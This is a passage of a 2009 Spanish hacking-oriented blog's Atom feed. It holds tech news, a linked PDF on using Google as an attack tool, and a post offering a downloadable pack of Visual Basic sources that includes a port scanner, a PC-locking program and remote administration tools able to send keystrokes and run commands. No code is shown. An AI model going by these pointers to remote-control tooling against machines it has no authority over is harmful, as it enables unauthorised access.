/&gt;&lt;a href="http://www.kriptopolis.org/docs/tcmanual.pdf"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-7876688459211879733?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/7876688459211879733/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/08/manual-de-truecrypt-para-windows.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/7876688459211879733'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/7876688459211879733'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/08/manual-de-truecrypt-para-windows.html' title='Manual de TrueCrypt para Windows'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-1456641242435429895</id><published>2009-08-11T11:46:00.000-07:00</published><updated>2009-08-11T11:50:20.122-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><category scheme='http://www.blogger.com/atom/ns#' term='Defacing'/><title type='text'>Usando Google Como Herramienta De Ataque</title><content type='html'>Bueno, os dejo este interesante pdf:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;embed type="application/pdf" src="http://consultatusdudas.googlepages.com/Google_N26_ago06.pdf" width="500" height="400"&gt;&lt;/embed&gt;&lt;noembed&gt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;a href="http://consultatusdudas.googlepages.com/Google_N26_ago06.pdf" target="_blank"&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;http://consultatusdudas.googlepages.com/Google_N26_ago06.pdf&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;&lt;/noembed&gt;&lt;br /&gt;&lt;br /&gt;   &lt;br /&gt;    &lt;div id="msg_14540_footer" class="attachments smalltext"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;   Pueden verlo tambien &lt;a href="http://consultatusdudas.googlepages.com/Google_N26_ago06.pdf"&gt;&lt;span style="font-weight: bold;"&gt;aqui&lt;/span&gt;&lt;/a&gt;!&lt;br /&gt;&lt;div class="moderatorbar"&gt;&lt;div class="smalltext floatleft" id="modified_14540"&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;xassiz&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-1456641242435429895?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/1456641242435429895/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/08/usando-google-como-herramienta-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1456641242435429895'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1456641242435429895'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/08/usando-google-como-herramienta-de.html' title='Usando Google Como Herramienta De Ataque'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-9203388345099134502</id><published>2009-08-11T11:41:00.000-07:00</published><updated>2009-08-11T11:42:11.209-07:00</updated><title type='text'>Baidu, el buscador chino - la competencia de Google</title><content type='html'>&lt;img src="http://www.dacros.com.ar/uploads/Noticias/Internet/agosto%202009/baidu_logo.gif" alt="" border="0" /&gt;Baidu, el buscador chino, que especializa en música y vídeos, crece a un ritmo veloz y ocupa el segundo lugar como motor de búsqueda en todo el mundo aunque sus usuarios esten concentrados en China, el país con más habitantes del mundo y con un crecimiento en Internet muy superior al resto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Según los datos estadísticos ofrecidos por marketshare, Baidu obtuvo durante el pasado mes de julio, una cuota de mercado del 8.87%, lo que le sitúa en número de usuarios por encima de Yahoo y Bing. No obstante, esta cuota de mercado podría crecer de forma importante caso de dar el salto a otros idiomas (ingles, castellano, portugues...), ya que actualmente Baidu se encuentra disponible en chino.&lt;br /&gt;&lt;br /&gt;Esta situación no ha pasado desapercibida por Google que ha iniciado una política de expansión en el país asiático con medidas polémicas con las que trata de evitar la confrontación con el Gobierno chino y que le permitan crecer lo máximo posible en casa de uno de sus potenciales rivales.&lt;br /&gt;&lt;br /&gt;De esta manera Google aceptó censurar las búsqueda de contenidos considerados sensibles, como el estado de los derechos humanos, o no ofrecer a los usuarios chinos su servicio de correo electrónico, mensajería instantánea.&lt;br /&gt;&lt;br /&gt;Fuente: dacros.com.ar&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-9203388345099134502?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/9203388345099134502/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/08/baidu-el-buscador-chino-la-competencia.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/9203388345099134502'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/9203388345099134502'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/08/baidu-el-buscador-chino-la-competencia.html' title='Baidu, el buscador chino - la competencia de Google'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-5432963956149949915</id><published>2009-08-11T11:36:00.001-07:00</published><updated>2009-08-11T11:36:48.400-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Windows 8 verá la luz en 2012</title><content type='html'>Han sido tres años el tiempo que han tenido que esperar los usuarios para asistir al nacimiento de Windows 7 y serán otros tres lo que tardará en aparecer Windows 8, actualmente en desarrollo y con una fecha de salida prevista para finales del 2012.&lt;br /&gt;&lt;br /&gt;Desde el lanzamiento de Vista el 30 de enero de 2007, el avance de la tecnología ha sido indiscutible y la que será la octava versión de la plataforma de Microsoft promete innovar y no defraudar. De momento sabemos que podría integrar elementos de Midori, el proyecto de investigación de un SO modular de Microsoft.&lt;br /&gt;&lt;br /&gt;El calendario de difusión de Windows 8 ha sido desvelado por la firma de Redmond durante una conferencia en Italia. Pero estos tres años de espera no son pura coincidencia, ya que la fecha ha sido elegida para competir directamente con Mac OS y así mantener la fidelidad de los consumidores, según informa Silicon News.&lt;br /&gt;&lt;br /&gt;Parece que los cinco años transcurridos entre Windows XP y Vista se hicieron demasiado largos para la paciencia del público, por lo que el fabricante ha decidido reducir sistemáticamente el lapso entre sistemas operativos.&lt;br /&gt;&lt;br /&gt;P.D:Ahora el lapso va ser mas corto para y mas facil para los vicser y crakers,jejejeej &lt;img src="http://foro.latinohack.com/images/smilies/action-smiley-057.gif" alt="" title="Action Smiley 057" class="inlineimg" border="0" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-5432963956149949915?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/5432963956149949915/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/08/windows-8-vera-la-luz-en-2012.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5432963956149949915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5432963956149949915'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/08/windows-8-vera-la-luz-en-2012.html' title='Windows 8 verá la luz en 2012'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-9176879854831412054</id><published>2009-08-11T11:34:00.000-07:00</published><updated>2009-10-10T10:52:19.941-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Visual Basic'/><title type='text'>15 Codigos fuente en VB esenciales</title><content type='html'>&lt;b&gt;El pack trae los siguientes códigos de fuente :&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Enviar backup por e-mail&lt;/b&gt;&lt;br /&gt;Formulario que envia un backup de respaldo a una cuenta de correo , los dias que indiquemos , cada ves que inicia el programa.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Server ftp - diógenes&lt;/b&gt;&lt;br /&gt;Servidor ftp programado en vb&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Navegador con pestañas&lt;/b&gt;&lt;br /&gt;Ejemplo de un navegador web con pestañas usando el control webBrowser y un control TabStrip&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Programa para bloquear PC&lt;/b&gt;&lt;br /&gt;Código fuente de un programa que permite bloquear una o varias pc conectadas en red&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Escanear puertos&lt;/b&gt;&lt;br /&gt;Código fuente que usa el control Winsock para escanear los puertos de un Host&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Server At&lt;/b&gt;&lt;br /&gt;Código fuente que permite acceder a una pc por medio de un navegador web.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cliente FTP&lt;/b&gt;&lt;br /&gt;Módulo de clase de un Cliente Ftp con las opciones para subir y descargar archivos , crear, renombrar y eliminar etc.. . Utiliza las Apis de wininet&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Explorador remoto de Pc&lt;/b&gt;&lt;br /&gt;Código fuente realizado por Leandro Ascierto de un explorador remoto de pc, permite transferir archivos , renombrar, eliminar y buscar ficheros , ver los procesos remotos y ejecutarlos etc..&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Enviar ficheros con el control Winsock&lt;/b&gt;&lt;br /&gt;Proyecto simple para transferir archivos utilizando el Microsoft Winsock control&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Enviar imágenes con Winsock&lt;/b&gt;&lt;br /&gt;Ejemplo que utiliza el control Microsoft Winsock para enviar imágenes entre un formulario cliente y un form Servidor&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Administrador remoto cliente - servidor&lt;/b&gt;&lt;br /&gt;Ejemplo que usa un formulario Cliente y un Formulario Servidor y permite enviar pulsaciones de teclas , un mensaje , enviar un comando , cerrar un proceso etc..&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Chat en visual basic&lt;/b&gt;&lt;br /&gt;Código fuente de un Programa de Chat con opciones para enviar texto enriquecido , enviar sonido e imágenes, audio, webcam , Emoticons y algunas otras opciones&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;spyUserAgent&lt;/b&gt;&lt;br /&gt;Programa realizado en vb 6.0 que permite extraer y mostrar datos en la web&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ip finder&lt;/b&gt;&lt;br /&gt;Obtener el pais al que pertenece una ip y viceversa, accediendo a los datos desde una bd Access por medio de una consulta sql&lt;br /&gt;&lt;br /&gt;&lt;b&gt;---------------------------------------------------------&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:Red;"&gt;&lt;b&gt;Descargar&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/124832005/Codigos_fuente_sobre_inet__controles_winsock_y___by_leann.rar" target="_blank"&gt;&lt;span style="color:White;"&gt;http://rapidshare.com/files/124832005/Codigos_fuente_sobre_inet__controles_winsock_y___b  y_leann.rar&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;0&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=L6MYGVYR" target="_blank"&gt;&lt;span style="color:#ffffff;"&gt;http://www.megaupload.com/?d=L6MYGVYR&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;Fuente: LatinoHack&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-9176879854831412054?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/9176879854831412054/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/08/15-codigos-fuente-en-vb-esenciales.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/9176879854831412054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/9176879854831412054'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/08/15-codigos-fuente-en-vb-esenciales.html' title='15 Codigos fuente en VB esenciales'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-6888153812351034149</id><published>2009-08-11T11:30:00.001-07:00</published><updated>2009-08-11T11:30:41.278-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><title type='text'>Google prepara una evolución a su buscador</title><content type='html'>&lt;!-- message --&gt; &lt;div id="post_message_43848" class="vb_postbit"&gt; &lt;!-- BEGIN TEMPLATE: ad_showthread_firstpost_start --&gt;  &lt;!-- END TEMPLATE: ad_showthread_firstpost_start --&gt; El nuevo índice de búsquedas de Google se llama Caffeine y por lo visto será la base de la futura arquitec
